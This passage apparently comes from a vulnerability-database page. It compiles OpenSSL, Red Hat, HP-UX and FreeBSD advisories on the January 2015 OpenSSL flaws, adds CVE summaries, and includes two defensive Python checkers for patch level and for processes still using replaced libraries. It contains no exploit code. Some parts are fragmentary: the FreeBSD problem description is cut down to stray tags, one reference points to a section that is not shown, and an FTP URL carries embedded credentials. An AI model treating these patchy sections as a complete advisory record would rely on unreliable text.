(Blockstream) who also suggested an initial fix. Further analysis was
conducted by the OpenSSL development team and Adam Langley of
Google. The final fix was developed by Andy Polyakov of the OpenSSL
core team.
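Every issue above ends with the same instruction: 1.0.1 to 1.0.1k, 1.0.0 to 1.0.0p, 0.9.8 to 0.9.8zd. The following is an added example, not OpenSSL code, that turns that table into a check over the output of `openssl version`, handling the letter suffixes that make plain string comparison wrong (`zd` sorts after `k`, and the bare series with no letter is the oldest). The `FIXED_IN` table is taken from this advisory; the regex and function names are the example's own.

```python
import re
from typing import Optional

# Fixed releases named in the OpenSSL advisory of 08 Jan 2015, by release series.
FIXED_IN = {"1.0.1": "k", "1.0.0": "p", "0.9.8": "zd"}

# "OpenSSL 1.0.1e-fips 11 Feb 2013" -> series "1.0.1", patch letters "e"
BANNER_RE = re.compile(r"OpenSSL\s+(\d+\.\d+\.\d+)([a-z]*)")

def letter_rank(letters: str) -> int:
    """Order OpenSSL patch letters: '' < a < ... < z < za < zb < ... (base-26 positional)."""
    rank = 0
    for ch in letters:
        rank = rank * 26 + (ord(ch) - ord("a") + 1)
    return rank

def parse_banner(banner: str):
    m = BANNER_RE.search(banner)
    if m is None:
        raise ValueError(f"not an OpenSSL version banner: {banner!r}")
    return m.group(1), m.group(2)

def is_vulnerable(banner: str) -> Optional[bool]:
    """True if the banner is older than the fixed release of its series, False if at or
    past it, None if the series is not covered by this advisory (e.g. 1.0.2)."""
    series, letters = parse_banner(banner)
    fixed = FIXED_IN.get(series)
    if fixed is None:
        return None
    return letter_rank(letters) < letter_rank(fixed)

if __name__ == "__main__":
    import subprocess
    try:
        banner = subprocess.run(["openssl", "version"], capture_output=True, text=True).stdout
    except FileNotFoundError:
        banner = "OpenSSL 1.0.1f 6 Jan 2014"   # constructed fallback when no openssl binary
    verdict = {True: "UPGRADE", False: "fixed", None: "not covered"}[is_vulnerable(banner)]
    print(banner.strip(), "->", verdict)
```

The caveat for distribution builds: Debian, Ubuntu and Red Hat keep the upstream banner (for example `1.0.1e` on RHEL 6) while backporting the fixes, so on those systems compare the package version against the versions listed in the vendor advisories on this page instead of trusting the banner. The banner check is for upstream builds and for spotting hosts that obviously lag.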
[1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf
Note
====
As per our previous announcements and our Release Strategy
(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions
1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these
releases will be provided after that date. Users of these releases are advised
to upgrade.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv_20150108.txt
Note: the online version of the advisory may be updated with additional
details over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html

=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: openssl security update
Advisory ID: RHSA-2015:0066-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html
Issue date: 2015-01-20
Updated on: 2015-01-21
CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572
CVE-2014-8275 CVE-2015-0204 CVE-2015-0205
CVE-2015-0206
=====================================================================
1. Summary:
Updated openssl packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),
Transport Layer Security (TLS), and Datagram Transport Layer Security
(DTLS) protocols, as well as a full-strength, general purpose cryptography
library.
A NULL pointer dereference flaw was found in the DTLS implementation of
OpenSSL. A remote attacker could send a specially crafted DTLS message,
which would cause an OpenSSL server to crash. (CVE-2014-3571)
A memory leak flaw was found in the way the dtls1_buffer_record() function
of OpenSSL handled certain DTLS records. A remote attacker could send
multiple specially crafted DTLS messages to exhaust all available memory of
a DTLS server. (CVE-2015-0206)
It was found that OpenSSL's bignum squaring (BN_sqr) could produce incorrect
results on certain platforms. This flaw could possibly affect certain
OpenSSL library functionality, such as RSA blinding. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a
non-ephemeral key even when the ephemeral ECDH cipher suite was selected.
A malicious server could use this flaw to remove forward secrecy from the
session. (CVE-2014-3572)
It was discovered that an OpenSSL client would accept a temporary RSA key
in a non-export RSA cipher suite. A malicious server could use this flaw to
downgrade the key exchange to a weak key. (CVE-2015-0204)
Multiple flaws were found in the way OpenSSL parsed the signature algorithm
and signature encodings of X.509 certificates. An attacker could use these
flaws to modify an X.509 certificate to produce a certificate with a
different fingerprint without invalidating its signature, and possibly
bypass fingerprint-based blacklisting in applications. (CVE-2014-8275)
It was found that an OpenSSL server would accept a DH client certificate
without the CertificateVerify message, allowing a client to authenticate
without possessing the corresponding private key. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to mitigate the above issues. For the update to
take effect, all services linked to the OpenSSL library (such as httpd and
other SSL-enabled services) must be restarted or the system rebooted.
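The restart requirement above (also stated in the FreeBSD advisory's "Restart all daemons using the library") is the step most often missed: a daemon started before the upgrade keeps the old libssl/libcrypto mapped even though the file on disk has been replaced. The following is an added example, not Red Hat or OpenSSL tooling, that finds such processes on Linux by looking for OpenSSL objects that `/proc/<pid>/maps` marks as `(deleted)`. The sample maps text is constructed; the regex and function names are the example's own.

```python
import os
import re
from typing import Dict, Set, Tuple

# A /proc/<pid>/maps line ends with the backing file; the kernel appends " (deleted)"
# when that file has been unlinked or replaced, i.e. the process still runs old code.
MAPS_RE = re.compile(r"(/\S*lib(?:ssl|crypto)\.so\S*?)(\s+\(deleted\))?\s*$")

def stale_openssl_libs(maps_text: str) -> Set[str]:
    """Paths of libssl/libcrypto objects mapped from a file that no longer exists."""
    stale = set()
    for line in maps_text.splitlines():
        m = MAPS_RE.search(line)
        if m and m.group(2):
            stale.add(m.group(1))
    return stale

def scan_proc(proc: str = "/proc") -> Dict[int, Tuple[str, Set[str]]]:
    """Return {pid: (command, stale paths)} for every process holding a replaced OpenSSL."""
    found = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(f"{proc}/{entry}/maps") as f:
                stale = stale_openssl_libs(f.read())
            with open(f"{proc}/{entry}/comm") as f:
                comm = f.read().strip()
        except OSError:          # process exited, or not ours to read
            continue
        if stale:
            found[int(entry)] = (comm, stale)
    return found

# Constructed sample: libcrypto already reloaded, libssl still mapped from the deleted file.
SAMPLE_MAPS = """\
7f2c8a000000-7f2c8a1d0000 r-xp 00000000 fd:01 131095 /usr/lib64/libcrypto.so.1.0.1e
7f2c8a3d0000-7f2c8a430000 r-xp 00000000 fd:01 131096 /usr/lib64/libssl.so.1.0.1e (deleted)
7f2c8a640000-7f2c8a7f0000 r-xp 00000000 fd:01 1049 /usr/lib64/libc-2.12.so
7f2c8aa00000-7f2c8aa21000 rw-p 00000000 00:00 0
"""

if __name__ == "__main__":
    for pid, (comm, paths) in sorted(scan_proc().items()):
        print(f"{pid:>7} {comm:<16} {', '.join(sorted(paths))}")
```

Run it as root after the package update; anything it lists needs a restart (or the host a reboot) before the update can be considered applied. Note that a statically linked OpenSSL, or one bundled inside an application's own directory as in the HP IceWall case above, does not show up this way and has to be tracked through the application's own update path.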
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites
1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix
1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues
1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record
1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record
1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification
1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-1.0.1e-30.el6_6.5.ppc.rpm
openssl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-1.0.1e-30.el6_6.5.s390.rpm
openssl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64:
openssl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-static-1.0.1e-34.el7_0.7.s390.rpm
openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-3570
https://access.redhat.com/security/cve/CVE-2014-3571
https://access.redhat.com/security/cve/CVE-2014-3572
https://access.redhat.com/security/cve/CVE-2014-8275
https://access.redhat.com/security/cve/CVE-2015-0204
https://access.redhat.com/security/cve/CVE-2015-0205
https://access.redhat.com/security/cve/CVE-2015-0206
https://access.redhat.com/security/updates/classification/#moderate
https://www.openssl.org/news/secadv_20150108.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X
ENFobdxQdJ+gVAiRe8Qf54A=
=wyAg
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
References:
CVE-2014-8275 Cryptographic Issues (CWE-310)
CVE-2014-3569 Remote Denial of Service (DoS)
CVE-2014-3570 Cryptographic Issues (CWE-310)
CVE-2014-3571 Remote Denial of Service (DoS)
CVE-2014-3572 Cryptographic Issues (CWE-310)
CVE-2015-0204 Cryptographic Issues (CWE-310)
SSRT101885
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The
updates are available from either of the following sites:
ftp://sl098ze:Secure12@h2.usa.hp.com
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=OPENSSL11I
HP-UX Release        HP-UX OpenSSL depot name
B.11.11 (11i v1)     OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot
B.11.23 (11i v2)     OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3)     OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08ze or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant
| VAR-201501-0442 | CVE-2014-8275 | OpenSSL Encryption problem vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c. OpenSSL is prone to a local security-bypass vulnerability.
Local attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
=============================================================================
FreeBSD-SA-15:01.openssl Security Advisory
The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib
Module: openssl
Announced: 2015-01-14
Affects: All supported versions of FreeBSD.
Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE)
2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4)
2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16)
2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE)
2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8)
2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE)
2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22)
CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572
CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.
II. Problem Description
[CVE-2014-3569] This does not affect
FreeBSD's default build. [CVE-2014-3570]
III. Impact
An attacker who can send a carefully crafted DTLS message can cause server
daemons that use OpenSSL to crash, resulting in a Denial of Service. [CVE-2014-8275]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc
# gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.0]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc
# gpg --verify openssl-10.0.patch.asc
[FreeBSD 10.1]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc
# gpg --verify openssl-10.1.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.
Restart all daemons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/8/ r276865
releng/8.4/ r277195
stable/9/ r276865
releng/9.3/ r277195
stable/10/ r276864
releng/10.0/ r277195
releng/10.1/ r277195
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII. References
<URL:https://www.openssl.org/news/secadv_20150108.txt>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206>
The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:01.openssl.asc>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.1.1 (FreeBSD)
=ztFk
-----END PGP SIGNATURE-----
The Montgomery ladder implementation in OpenSSL through 1.0.0l does
not ensure that certain swap operations have a constant-time behavior,
which makes it easier for local users to obtain ECDSA nonces via a
FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before
1.0.1g do not properly handle Heartbeat Extension packets, which allows
remote attackers to obtain sensitive information from process memory
via crafted packets that trigger a buffer over-read, as demonstrated
by reading private keys, related to d1_both.c and t1_lib.c, aka the
Heartbleed bug (CVE-2014-0160).
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does
not properly validate fragment lengths in DTLS ClientHello messages,
which allows remote attackers to execute arbitrary code or cause a
denial of service (buffer overflow and application crash) via a long
non-initial fragment (CVE-2014-0195).
The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g,
when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a
buffer pointer during certain recursive calls, which allows remote
attackers to cause a denial of service (NULL pointer dereference
and application crash) via vectors that trigger an alert condition
(CVE-2014-0198).
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before
1.0.1h does not properly restrict processing of ChangeCipherSpec
messages, which allows man-in-the-middle attackers to trigger use of a
zero-length master key in certain OpenSSL-to-OpenSSL communications,
and consequently hijack sessions or obtain sensitive information,
via a crafted TLS handshake, aka the CCS Injection vulnerability
(CVE-2014-0224).
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when
an anonymous ECDH cipher suite is used, allows remote attackers to
cause a denial of service (NULL pointer dereference and client crash)
by triggering a NULL certificate value (CVE-2014-3470).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
products, uses nondeterministic CBC padding, which makes it easier
for man-in-the-middle attackers to obtain cleartext data via a
padding-oracle attack, aka the POODLE issue (CVE-2014-3566).
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL
0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to
use unsupported protocols, which allows remote attackers to cause a
denial of service (NULL pointer dereference and daemon crash) via
an unexpected handshake, as demonstrated by an SSLv3 handshake to
